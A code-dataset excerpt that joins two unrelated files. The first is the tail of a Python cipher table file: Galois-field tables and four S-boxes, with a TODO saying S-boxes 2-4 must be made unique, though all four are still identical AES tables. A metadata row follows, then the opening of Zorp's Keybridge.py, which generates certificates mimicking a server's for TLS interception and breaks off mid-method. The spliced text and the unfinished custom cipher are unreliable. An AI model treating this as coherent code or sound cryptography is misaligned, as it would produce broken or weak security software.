0x5b, 0x58, 0x5d, 0x5e, 0x57, 0x54, 0x51, 0x52, 0x43, 0x40, 0x45, 0x46, 0x4f, 0x4c, 0x49, 0x4a,
0x6b, 0x68, 0x6d, 0x6e, 0x67, 0x64, 0x61, 0x62, 0x73, 0x70, 0x75, 0x76, 0x7f, 0x7c, 0x79, 0x7a,
0x3b, 0x38, 0x3d, 0x3e, 0x37, 0x34, 0x31, 0x32, 0x23, 0x20, 0x25, 0x26, 0x2f, 0x2c, 0x29, 0x2a,
0x0b, 0x08, 0x0d, 0x0e, 0x07, 0x04, 0x01, 0x02, 0x13, 0x10, 0x15, 0x16, 0x1f, 0x1c, 0x19, 0x1a)
gal9 = (
0x00, 0x09, 0x12, 0x1b, 0x24, 0x2d, 0x36, 0x3f, 0x48, 0x41, 0x5a, 0x53, 0x6c, 0x65, 0x7e, 0x77,
0x90, 0x99, 0x82, 0x8b, 0xb4, 0xbd, 0xa6, 0xaf, 0xd8, 0xd1, 0xca, 0xc3, 0xfc, 0xf5, 0xee, 0xe7,
0x3b, 0x32, 0x29, 0x20, 0x1f, 0x16, 0x0d, 0x04, 0x73, 0x7a, 0x61, 0x68, 0x57, 0x5e, 0x45, 0x4c,
0xab, 0xa2, 0xb9, 0xb0, 0x8f, 0x86, 0x9d, 0x94, 0xe3, 0xea, 0xf1, 0xf8, 0xc7, 0xce, 0xd5, 0xdc,
0x76, 0x7f, 0x64, 0x6d, 0x52, 0x5b, 0x40, 0x49, 0x3e, 0x37, 0x2c, 0x25, 0x1a, 0x13, 0x08, 0x01,
0xe6, 0xef, 0xf4, 0xfd, 0xc2, 0xcb, 0xd0, 0xd9, 0xae, 0xa7, 0xbc, 0xb5, 0x8a, 0x83, 0x98, 0x91,
0x4d, 0x44, 0x5f, 0x56, 0x69, 0x60, 0x7b, 0x72, 0x05, 0x0c, 0x17, 0x1e, 0x21, 0x28, 0x33, 0x3a,
0xdd, 0xd4, 0xcf, 0xc6, 0xf9, 0xf0, 0xeb, 0xe2, 0x95, 0x9c, 0x87, 0x8e, 0xb1, 0xb8, 0xa3, 0xaa,
0xec, 0xe5, 0xfe, 0xf7, 0xc8, 0xc1, 0xda, 0xd3, 0xa4, 0xad, 0xb6, 0xbf, 0x80, 0x89, 0x92, 0x9b,
0x7c, 0x75, 0x6e, 0x67, 0x58, 0x51, 0x4a, 0x43, 0x34, 0x3d, 0x26, 0x2f, 0x10, 0x19, 0x02, 0x0b,
0xd7, 0xde, 0xc5, 0xcc, 0xf3, 0xfa, 0xe1, 0xe8, 0x9f, 0x96, 0x8d, 0x84, 0xbb, 0xb2, 0xa9, 0xa0,
0x47, 0x4e, 0x55, 0x5c, 0x63, 0x6a, 0x71, 0x78, 0x0f, 0x06, 0x1d, 0x14, 0x2b, 0x22, 0x39, 0x30,
0x9a, 0x93, 0x88, 0x81, 0xbe, 0xb7, 0xac, 0xa5, 0xd2, 0xdb, 0xc0, 0xc9, 0xf6, 0xff, 0xe4, 0xed,
0x0a, 0x03, 0x18, 0x11, 0x2e, 0x27, 0x3c, 0x35, 0x42, 0x4b, 0x50, 0x59, 0x66, 0x6f, 0x74, 0x7d,
0xa1, 0xa8, 0xb3, 0xba, 0x85, 0x8c, 0x97, 0x9e, 0xe9, 0xe0, 0xfb, 0xf2, 0xcd, 0xc4, 0xdf, 0xd6,
0x31, 0x38, 0x23, 0x2a, 0x15, 0x1c, 0x07, 0x0e, 0x79, 0x70, 0x6b, 0x62, 0x5d, 0x54, 0x4f, 0x46)
gal11 = (
0x00, 0x0b, 0x16, 0x1d, 0x2c, 0x27, 0x3a, 0x31, 0x58, 0x53, 0x4e, 0x45, 0x74, 0x7f, 0x62, 0x69,
0xb0, 0xbb, 0xa6, 0xad, 0x9c, 0x97, 0x8a, 0x81, 0xe8, 0xe3, 0xfe, 0xf5, 0xc4, 0xcf, 0xd2, 0xd9,
0x7b, 0x70, 0x6d, 0x66, 0x57, 0x5c, 0x41, 0x4a, 0x23, 0x28, 0x35, 0x3e, 0x0f, 0x04, 0x19, 0x12,
0xcb, 0xc0, 0xdd, 0xd6, 0xe7, 0xec, 0xf1, 0xfa, 0x93, 0x98, 0x85, 0x8e, 0xbf, 0xb4, 0xa9, 0xa2,
0xf6, 0xfd, 0xe0, 0xeb, 0xda, 0xd1, 0xcc, 0xc7, 0xae, 0xa5, 0xb8, 0xb3, 0x82, 0x89, 0x94, 0x9f,
0x46, 0x4d, 0x50, 0x5b, 0x6a, 0x61, 0x7c, 0x77, 0x1e, 0x15, 0x08, 0x03, 0x32, 0x39, 0x24, 0x2f,
0x8d, 0x86, 0x9b, 0x90, 0xa1, 0xaa, 0xb7, 0xbc, 0xd5, 0xde, 0xc3, 0xc8, 0xf9, 0xf2, 0xef, 0xe4,
0x3d, 0x36, 0x2b, 0x20, 0x11, 0x1a, 0x07, 0x0c, 0x65, 0x6e, 0x73, 0x78, 0x49, 0x42, 0x5f, 0x54,
0xf7, 0xfc, 0xe1, 0xea, 0xdb, 0xd0, 0xcd, 0xc6, 0xaf, 0xa4, 0xb9, 0xb2, 0x83, 0x88, 0x95, 0x9e,
0x47, 0x4c, 0x51, 0x5a, 0x6b, 0x60, 0x7d, 0x76, 0x1f, 0x14, 0x09, 0x02, 0x33, 0x38, 0x25, 0x2e,
0x8c, 0x87, 0x9a, 0x91, 0xa0, 0xab, 0xb6, 0xbd, 0xd4, 0xdf, 0xc2, 0xc9, 0xf8, 0xf3, 0xee, 0xe5,
0x3c, 0x37, 0x2a, 0x21, 0x10, 0x1b, 0x06, 0x0d, 0x64, 0x6f, 0x72, 0x79, 0x48, 0x43, 0x5e, 0x55,
0x01, 0x0a, 0x17, 0x1c, 0x2d, 0x26, 0x3b, 0x30, 0x59, 0x52, 0x4f, 0x44, 0x75, 0x7e, 0x63, 0x68,
0xb1, 0xba, 0xa7, 0xac, 0x9d, 0x96, 0x8b, 0x80, 0xe9, 0xe2, 0xff, 0xf4, 0xc5, 0xce, 0xd3, 0xd8,
0x7a, 0x71, 0x6c, 0x67, 0x56, 0x5d, 0x40, 0x4b, 0x22, 0x29, 0x34, 0x3f, 0x0e, 0x05, 0x18, 0x13,
0xca, 0xc1, 0xdc, 0xd7, 0xe6, 0xed, 0xf0, 0xfb, 0x92, 0x99, 0x84, 0x8f, 0xbe, 0xb5, 0xa8, 0xa3)
gal13 = (
0x00, 0x0d, 0x1a, 0x17, 0x34, 0x39, 0x2e, 0x23, 0x68, 0x65, 0x72, 0x7f, 0x5c, 0x51, 0x46, 0x4b,
0xd0, 0xdd, 0xca, 0xc7, 0xe4, 0xe9, 0xfe, 0xf3, 0xb8, 0xb5, 0xa2, 0xaf, 0x8c, 0x81, 0x96, 0x9b,
0xbb, 0xb6, 0xa1, 0xac, 0x8f, 0x82, 0x95, 0x98, 0xd3, 0xde, 0xc9, 0xc4, 0xe7, 0xea, 0xfd, 0xf0,
0x6b, 0x66, 0x71, 0x7c, 0x5f, 0x52, 0x45, 0x48, 0x03, 0x0e, 0x19, 0x14, 0x37, 0x3a, 0x2d, 0x20,
0x6d, 0x60, 0x77, 0x7a, 0x59, 0x54, 0x43, 0x4e, 0x05, 0x08, 0x1f, 0x12, 0x31, 0x3c, 0x2b, 0x26,
0xbd, 0xb0, 0xa7, 0xaa, 0x89, 0x84, 0x93, 0x9e, 0xd5, 0xd8, 0xcf, 0xc2, 0xe1, 0xec, 0xfb, 0xf6,
0xd6, 0xdb, 0xcc, 0xc1, 0xe2, 0xef, 0xf8, 0xf5, 0xbe, 0xb3, 0xa4, 0xa9, 0x8a, 0x87, 0x90, 0x9d,
0x06, 0x0b, 0x1c, 0x11, 0x32, 0x3f, 0x28, 0x25, 0x6e, 0x63, 0x74, 0x79, 0x5a, 0x57, 0x40, 0x4d,
0xda, 0xd7, 0xc0, 0xcd, 0xee, 0xe3, 0xf4, 0xf9, 0xb2, 0xbf, 0xa8, 0xa5, 0x86, 0x8b, 0x9c, 0x91,
0x0a, 0x07, 0x10, 0x1d, 0x3e, 0x33, 0x24, 0x29, 0x62, 0x6f, 0x78, 0x75, 0x56, 0x5b, 0x4c, 0x41,
0x61, 0x6c, 0x7b, 0x76, 0x55, 0x58, 0x4f, 0x42, 0x09, 0x04, 0x13, 0x1e, 0x3d, 0x30, 0x27, 0x2a,
0xb1, 0xbc, 0xab, 0xa6, 0x85, 0x88, 0x9f, 0x92, 0xd9, 0xd4, 0xc3, 0xce, 0xed, 0xe0, 0xf7, 0xfa,
0xb7, 0xba, 0xad, 0xa0, 0x83, 0x8e, 0x99, 0x94, 0xdf, 0xd2, 0xc5, 0xc8, 0xeb, 0xe6, 0xf1, 0xfc,
0x67, 0x6a, 0x7d, 0x70, 0x53, 0x5e, 0x49, 0x44, 0x0f, 0x02, 0x15, 0x18, 0x3b, 0x36, 0x21, 0x2c,
0x0c, 0x01, 0x16, 0x1b, 0x38, 0x35, 0x22, 0x2f, 0x64, 0x69, 0x7e, 0x73, 0x50, 0x5d, 0x4a, 0x47,
0xdc, 0xd1, 0xc6, 0xcb, 0xe8, 0xe5, 0xf2, 0xff, 0xb4, 0xb9, 0xae, 0xa3, 0x80, 0x8d, 0x9a, 0x97)
gal14 = (
0x00, 0x0e, 0x1c, 0x12, 0x38, 0x36, 0x24, 0x2a, 0x70, 0x7e, 0x6c, 0x62, 0x48, 0x46, 0x54, 0x5a,
0xe0, 0xee, 0xfc, 0xf2, 0xd8, 0xd6, 0xc4, 0xca, 0x90, 0x9e, 0x8c, 0x82, 0xa8, 0xa6, 0xb4, 0xba,
0xdb, 0xd5, 0xc7, 0xc9, 0xe3, 0xed, 0xff, 0xf1, 0xab, 0xa5, 0xb7, 0xb9, 0x93, 0x9d, 0x8f, 0x81,
0x3b, 0x35, 0x27, 0x29, 0x03, 0x0d, 0x1f, 0x11, 0x4b, 0x45, 0x57, 0x59, 0x73, 0x7d, 0x6f, 0x61,
0xad, 0xa3, 0xb1, 0xbf, 0x95, 0x9b, 0x89, 0x87, 0xdd, 0xd3, 0xc1, 0xcf, 0xe5, 0xeb, 0xf9, 0xf7,
0x4d, 0x43, 0x51, 0x5f, 0x75, 0x7b, 0x69, 0x67, 0x3d, 0x33, 0x21, 0x2f, 0x05, 0x0b, 0x19, 0x17,
0x76, 0x78, 0x6a, 0x64, 0x4e, 0x40, 0x52, 0x5c, 0x06, 0x08, 0x1a, 0x14, 0x3e, 0x30, 0x22, 0x2c,
0x96, 0x98, 0x8a, 0x84, 0xae, 0xa0, 0xb2, 0xbc, 0xe6, 0xe8, 0xfa, 0xf4, 0xde, 0xd0, 0xc2, 0xcc,
0x41, 0x4f, 0x5d, 0x53, 0x79, 0x77, 0x65, 0x6b, 0x31, 0x3f, 0x2d, 0x23, 0x09, 0x07, 0x15, 0x1b,
0xa1, 0xaf, 0xbd, 0xb3, 0x99, 0x97, 0x85, 0x8b, 0xd1, 0xdf, 0xcd, 0xc3, 0xe9, 0xe7, 0xf5, 0xfb,
0x9a, 0x94, 0x86, 0x88, 0xa2, 0xac, 0xbe, 0xb0, 0xea, 0xe4, 0xf6, 0xf8, 0xd2, 0xdc, 0xce, 0xc0,
0x7a, 0x74, 0x66, 0x68, 0x42, 0x4c, 0x5e, 0x50, 0x0a, 0x04, 0x16, 0x18, 0x32, 0x3c, 0x2e, 0x20,
0xec, 0xe2, 0xf0, 0xfe, 0xd4, 0xda, 0xc8, 0xc6, 0x9c, 0x92, 0x80, 0x8e, 0xa4, 0xaa, 0xb8, 0xb6,
0x0c, 0x02, 0x10, 0x1e, 0x34, 0x3a, 0x28, 0x26, 0x7c, 0x72, 0x60, 0x6e, 0x44, 0x4a, 0x58, 0x56,
0x37, 0x39, 0x2b, 0x25, 0x0f, 0x01, 0x13, 0x1d, 0x47, 0x49, 0x5b, 0x55, 0x7f, 0x71, 0x63, 0x6d,
0xd7, 0xd9, 0xcb, 0xc5, 0xef, 0xe1, 0xf3, 0xfd, 0xa7, 0xa9, 0xbb, 0xb5, 0x9f, 0x91, 0x83, 0x8d)
galI = gal14, gal11, gal13, gal9
galNI = gal2, gal3, gal1, gal1
# TODO NEED TO CHANGE SBOX 2-4 value to unique
sbox_1 = (
0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76,
0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0,
0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15,
0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75,
0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84,
0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf,
0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8,
0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2,
0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73,
0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb,
0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79,
0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08,
0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a,
0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e,
0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf,
0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16)
sbox_2 = (
0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76,
0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0,
0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15,
0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75,
0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84,
0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf,
0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8,
0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2,
0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73,
0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb,
0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79,
0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08,
0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a,
0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e,
0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf,
0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16)
sbox_3 = (
0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76,
0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0,
0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15,
0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75,
0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84,
0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf,
0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8,
0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2,
0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73,
0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb,
0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79,
0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08,
0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a,
0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e,
0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf,
0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16)
sbox_4 = (
0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76,
0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0,
0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15,
0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75,
0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84,
0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf,
0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8,
0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2,
0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73,
0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb,
0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79,
0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08,
0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a,
0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e,
0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf,
0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16)
|
apache-2.0
| -5,848,863,981,821,541,000 | 91.090395 | 99 | 0.639732 | false |
mochrul/zorp
|
pylib/Zorp/Keybridge.py
|
1
|
21313
|
############################################################################
##
## Copyright (c) 2000-2015 BalaBit IT Ltd, Budapest, Hungary
## Copyright (c) 2015-2018 BalaSys IT Ltd, Budapest, Hungary
##
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License along
## with this program; if not, write to the Free Software Foundation, Inc.,
## 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
##
############################################################################
"""
<module maturity="stable">
<summary>The Keybridge module implements generic X.509 key bridging.</summary>
<description>
<para>Keybridging is a method to let the client see a copy of the server's certificate (or vice versa), allowing it to inspect it and decide about its trustworthiness. Because of proxying the SSL/TLS connection, the client is not able to inspect the certificate of the server directly, therefore Zorp generates a certificate based on the server's certificate on-the-fly. This generated certificate is presented to the client.</para>
<para>For details on configuring keybridging, see <xref linkend="keybridging"/>.</para>
</description>
</module>
"""
from Zorp import *
from Certificate_ import ZorpCertificate
from FileLock import FileLock
import os
import OpenSSL
import hashlib
#
# Key selector is a hash containing one or more ways to
# identify a key or keypair. The meaning of various keys in the hash and how they are interpreted
# is as follows:
#
# 'zms-key' Contains the unique name of a keypair in ZMS
# 'bridge-trusted-key' Contains a certificate blob for which a new key can be generated,
# the key must be signed by the 'trusted' CA
# 'bridge-untrusted-key' Contains a certificate blob for which a new key can be generated,
# the key must be signed by the 'untrusted' CA.
#
class X509KeyManager(object):
"""<class type="x509keymanager" internal="yes">
</class>"""
def __init__(self):
pass
def getKeypair(self, selector):
pass
class X509KeyBridge(X509KeyManager):
"""<class type="x509keymanager">
<summary>
Class to perform SSL keybridging.
</summary>
<description>
<para>
This class is able to generate certificates mimicking another
certificate, primarily used to transfer the information of a server's certificate to the client in keybridging. For details on configuring keybridging, see <xref linkend="keybridging"/>.
</para>
</description>
<metainfo>
<attributes>
<attribute>
<name>key_file</name>
<type>
<string/>
</type>
<default>""</default>
<description>Name of the private key to be used for the newly generated certificates.</description>
</attribute>
<attribute>
<name>key_passphrase</name>
<type>
<string/>
</type>
<default>""</default>
<description>Passphrase required to access the private key stored in <parameter>key_file</parameter>.</description>
</attribute>
<attribute>
<name>cache_directory</name>
<type>
<string/>
</type>
<default>""</default>
<description>The directory where all automatically generated certificates are cached.</description>
</attribute>
<attribute>
<name>trusted_ca_files</name>
<type>
<certificate cert="yes" key="yes" ca="yes"/>
</type>
<default>None</default>
<description>A tuple of <parameter>cert_file</parameter>, <parameter>key_file</parameter>, <parameter>passphrase</parameter>) for the CA used for keybridging trusted certificates.</description>
</attribute>
<attribute>
<name>untrusted_ca_files</name>
<type>
<certificate cert="yes" key="yes" ca="yes"/>
</type>
<default>None</default>
<description>A tuple of <parameter>cert_file</parameter>, <parameter>key_file</parameter>, <parameter>passphrase</parameter>) for the CA used for keybridging untrusted certificates.</description>
</attribute>
</attributes>
</metainfo>
</class>"""
def __new__(cls, *args, **kwargs):
"""
<method internal="yes"/>
"""
obj = super(X509KeyBridge, cls).__new__(cls)
base = cls
if base.__name__ != "X509KeyBridge":
for base in cls.__bases__:
if base.__name__ == "X509KeyBridge":
break;
if kwargs.has_key("key_pem"):
base.__init__ = base._new_init
else:
base.__init__ = base._old_init
return obj
default_extension_whitelist = ('keyUsage', 'subjectAltName', 'extendedKeyUsage')
def _old_init(self, key_file, cache_directory=None, trusted_ca_files=None, untrusted_ca_files=None, key_passphrase = "",
extension_whitelist=None):
"""<method maturity="stable">
<metainfo>
<arguments>
<argument>
<name>key_file</name>
<type>
<certificate key="yes" cert="no"/>
</type>
<description>Name of the private key to be used for the newly generated certificates.</description>
</argument>
<argument>
<name>key_passphrase</name>
<type>
<string/>
</type>
<default>""</default>
<description>Passphrase required to access the private key stored in <parameter>key_file</parameter>.</description>
</argument>
<argument>
<name>cache_directory</name>
<type>
<string/>
</type>
<default>"/var/lib/zorp/keybridge-cache"</default>
<description>The directory where all automatically generated certificates are cached.</description>
</argument>
<argument>
<name>trusted_ca_files</name>
<type>
<certificate cert="yes" key="yes" ca="yes"/>
</type>
<description>A tuple of <parameter>cert_file</parameter>, <parameter>key_file</parameter>,
<parameter>passphrase</parameter>) for the CA used for keybridging trusted certificates.
</description>
</argument>
<argument>
<name>untrusted_ca_files</name>
<type>
<certificate cert="yes" key="yes" ca="yes"/>
</type>
<default>None</default>
<description>A tuple of <parameter>cert_file</parameter>, <parameter>key_file</parameter>,
<parameter>passphrase</parameter>) for the CA used for keybridging untrusted certificates.
</description>
</argument>
<argument>
<name>extension_whitelist</name>
<type>
<list><string/></list>
</type>
<default>None</default>
<description>
<para>Zorp transfers the following certificate extensions to the client side: <parameter>Key Usage</parameter>, <parameter>Subject Alternative Name</parameter>, <parameter>Extended Key Usage</parameter>. Other extensions will be automatically deleted during keybridging. This is needed because some certificate extensions contain references to the Issuer CA, which references become invalid for keybridged certificates. To transfer other extensions, list them in the <parameter>extension_whitelist</parameter> parameter. Note that modifying this parameter replaces the default values, so to extend the list of transferred extensions, include the <parameter>'keyUsage', 'subjectAltName', 'extendedKeyUsage'</parameter> list as well. For example:</para>
<synopsis>self.extension_whitelist = ('keyUsage', 'subjectAltName', 'extendedKeyUsage', 'customExtension')</synopsis>
</description>
</argument>
</arguments>
</metainfo>
</method>"""
"""Constructor to initialize an X509KeyBridge instance
This constructor initializes an X509KeyBridge instance by
loading the necessary keys and certificates from files. Make
sure that it is initialized once, instead of in every proxy
instance as that may degrade performance. This may be
achieved by putting the initialization into the class body
or into global context.
Arguments
key_file -- name of the private key to be used for all newly generated certificates
key_passphrase -- passphrase to use with private key key_file
cache_directory -- name of a directory where all automatically generated certificates are cached
trusted_ca_files -- a tuple of (cert_file, key_file, passphrase) for a CA to be used for signing certificates
untrusted_ca_files -- a tuple of (cert_file, key_file, passphrase) for a CA to be used for signing untrusted certificates
"""
key_pem = self.readPEM(key_file)
